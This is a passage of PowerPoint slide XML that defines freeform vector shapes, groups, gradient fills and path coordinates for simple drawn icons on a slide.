                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5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40505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6350" cap="flat" cmpd="sng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91" name="Freeform 1160">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749FDA36-639A-425C-AB7A-67512F3D486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35" y="1683"/>
                  <a:ext cx="59" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 28 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="8"/>
                        <a:pt x="28" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="66" y="38"/>
                        <a:pt x="91" y="32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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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64" name="Group 1161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D06C20-EAA3-4901-B7B5-D16B04F61E1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2724" y="1660"/>
                <a:ext cx="429" cy="228"/>
                <a:chOff x="786" y="2382"/>
                <a:chExt cx="1190" cy="634"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="974" name="Freeform 1162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE51EBA-68DA-4C10-ABED-6E00C254290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933" y="2464"/>
                  <a:ext cx="43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75" name="Freeform 1163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F184C86-101A-40A3-B9A3-3ED8C00D392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888" y="2464"/>
                  <a:ext cx="45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76" name="Freeform 1164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF730E60-7FA0-4187-B33D-935632C5A65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038" y="2694"/>
                  <a:ext cx="46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4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77" name="Freeform 1165">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F96D7E8-D635-4A93-A6BA-39D9B03551E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084" y="2694"/>
                  <a:ext cx="42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78" name="Freeform 1166">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F685D712-6C37-4340-87BC-5C30B39856D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786" y="2625"/>
                  <a:ext cx="45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79" name="Freeform 1167">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDDE4D15-A893-4EBB-8149-F5023B08699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831" y="2625"/>
                  <a:ext cx="43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0" name="Freeform 1168">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1288FB7-2F4A-4C00-BFDB-A17B212BC3F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33" y="2382"/>
                  <a:ext cx="42" cy="325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1" name="Freeform 1169">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5248C038-569D-48EF-B023-4E8D5B4F3D6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33" y="2394"/>
                  <a:ext cx="42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4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2" name="Freeform 1170">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C60E33FF-6C6A-4F50-937D-BD62B72BEF5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75" y="2394"/>
                  <a:ext cx="46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3" name="Freeform 1171">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6B002B2-6D69-4163-B0FC-E95F4D956F5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786" y="2382"/>
                  <a:ext cx="1190" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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Freeform 1172">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C193601-0517-4F0E-B846-101D9E4DCED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084" y="2464"/>
                  <a:ext cx="892" cy="285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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Freeform 1173">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A4D785-1649-41E9-8C5B-B60254BF138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786" y="2625"/>
                  <a:ext cx="298" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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5" name="Freeform 1174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D581FD87-5A29-4017-BD76-3DBB18512B9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932" y="1717"/>
                <a:ext cx="158" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 668 w 668"/>
                  <a:gd name="T1" fmla="*/ 76 h 177"/>
                  <a:gd name="T2" fmla="*/ 377 w 668"/>
                  <a:gd name="T3" fmla="*/ 0 h 177"/>
                  <a:gd name="T4" fmla="*/ 0 w 668"/>
                  <a:gd name="T5" fmla="*/ 102 h 177"/>
                  <a:gd name="T6" fmla="*/ 288 w 668"/>
                  <a:gd name="T7" fmla="*/ 177 h 177"/>
                  <a:gd name="T8" fmla="*/ 668 w 668"/>
                  <a:gd name="T9" fmla="*/ 76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8" h="177">
                    <a:moveTo>
                      <a:pt x="668" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="377" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="7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966" name="Group 1175">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D5A70D-2EE8-4384-B2EB-069C03280B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4" y="1636"/>
                <a:ext cx="134" cy="89"/>
                <a:chOff x="1859" y="2279"/>
                <a:chExt cx="372" cy="247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="967" name="Freeform 1176">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF7389E-7A4F-4431-A9A4-5A9515A9139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859" y="2412"/>
                  <a:ext cx="372" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25173"/>
                    <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T3" fmla="*/ 0 h 6756"/>
                    <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                    <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                    <a:gd name="T8" fmla="*/ 0 w 25173"/>
                    <a:gd name="T9" fmla="*/ 3378 h 67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173" h="6756">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25173" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="6756"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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1177">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0BBF65A-B885-4E8E-851F-95DC9BCFB1B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045" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12588"/>
                    <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12588"/>
                    <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T5" fmla="*/ 964 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T7" fmla="*/ 0 h 4342"/>
                    <a:gd name="T8" fmla="*/ 0 w 12588"/>
                    <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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69" name="Freeform 1178">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B171A115-F1AD-442F-9032-82380339773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859" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 964 h 4342"/>
                    <a:gd name="T4" fmla="*/ 0 w 12585"/>
                    <a:gd name="T5" fmla="*/ 0 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                      <a:moveTo>
                        <a:pt x="12585" y="4342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="43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70" name="Freeform 1179">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C69B8E-A509-475F-A3D1-910BC4175E0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912" y="2428"/>
                  <a:ext cx="252" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17020"/>
                    <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                    <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                    <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                    <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                    <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                    <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                    <a:gd name="T7" fmla="*/ 0 h 4567"/>
                    <a:gd name="T8" fmla="*/ 0 w 17020"/>
                    <a:gd name="T9" fmla="*/ 1711 h 45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020" h="4567">
                      <a:moveTo>
                        <a:pt x="0" y="1711"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10647" y="4567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17020" y="2859"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1711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71" name="Freeform 1180">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF77D46-C1FD-4EF7-80A0-F5ABE967DE1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859" y="2283"/>
                  <a:ext cx="186" cy="243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12585"/>
                    <a:gd name="T1" fmla="*/ 0 h 16411"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                    <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                    <a:gd name="T8" fmla="*/ 0 w 12585"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13033"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="16411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="337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72" name="Freeform 1181">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F392C4D-07F7-4B79-B24E-4FC0B47005D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045" y="2329"/>
                  <a:ext cx="14" cy="197"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 971"/>
                    <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                    <a:gd name="T2" fmla="*/ 971 w 971"/>
                    <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                    <a:gd name="T4" fmla="*/ 971 w 971"/>
                    <a:gd name="T5" fmla="*/ 0 h 13293"/>
                    <a:gd name="T6" fmla="*/ 0 w 971"/>
                    <a:gd name="T7" fmla="*/ 260 h 13293"/>
                    <a:gd name="T8" fmla="*/ 0 w 971"/>
                    <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                      <a:moveTo>
                        <a:pt x="0" y="13293"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="971" y="13030"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13293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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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Freeform 1182">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E625A79-D5C4-49F9-8B07-3845358E880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859" y="2279"/>
                  <a:ext cx="200" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                    <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                    <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                    <a:gd name="T4" fmla="*/ 0 w 13556"/>
                    <a:gd name="T5" fmla="*/ 260 h 3638"/>
                    <a:gd name="T6" fmla="*/ 971 w 13556"/>
                    <a:gd name="T7" fmla="*/ 0 h 3638"/>
                    <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T9" fmla="*/ 3378 h 36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56" h="3638">
                      <a:moveTo>
                        <a:pt x="13556" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13556" y="3378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47" name="Group 646">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABEBBF2-873B-457A-9C61-FB74B505F3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44554" y="5433470"/>
              <a:ext cx="488390" cy="146281"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="958" name="Freeform 280">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE68B67B-94B2-44D7-B3B3-9B20FCF1CFA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58" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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59" name="Freeform 281">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F096D40-23B7-4DBD-A15A-1957062892E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240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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37" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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60" name="Freeform 282">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702FA832-D15D-4B5B-8A5E-1B2E129B8A5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240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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61" name="Freeform 283">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D1A81F-DA69-498E-8C9D-0064A86EAE7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48" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449"/>
                  <a:gd name="T9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217">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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62" name="Freeform 284">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F59A12-F079-4F0A-A9C5-5CA808C180A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104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458">
                    <a:moveTo>
                      <a:pt x="0" y="458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:soli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648" name="Group 1359">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE6D1FFF-AF73-4155-8249-7FA9F87AC3E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150179" y="5126753"/>
              <a:ext cx="338569" cy="324414"/>
              <a:chOff x="733" y="778"/>
              <a:chExt cx="430" cy="412"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="950" name="Freeform 1360">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F511527F-7A5F-4925-9226-ED989AF158D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733" y="778"/>
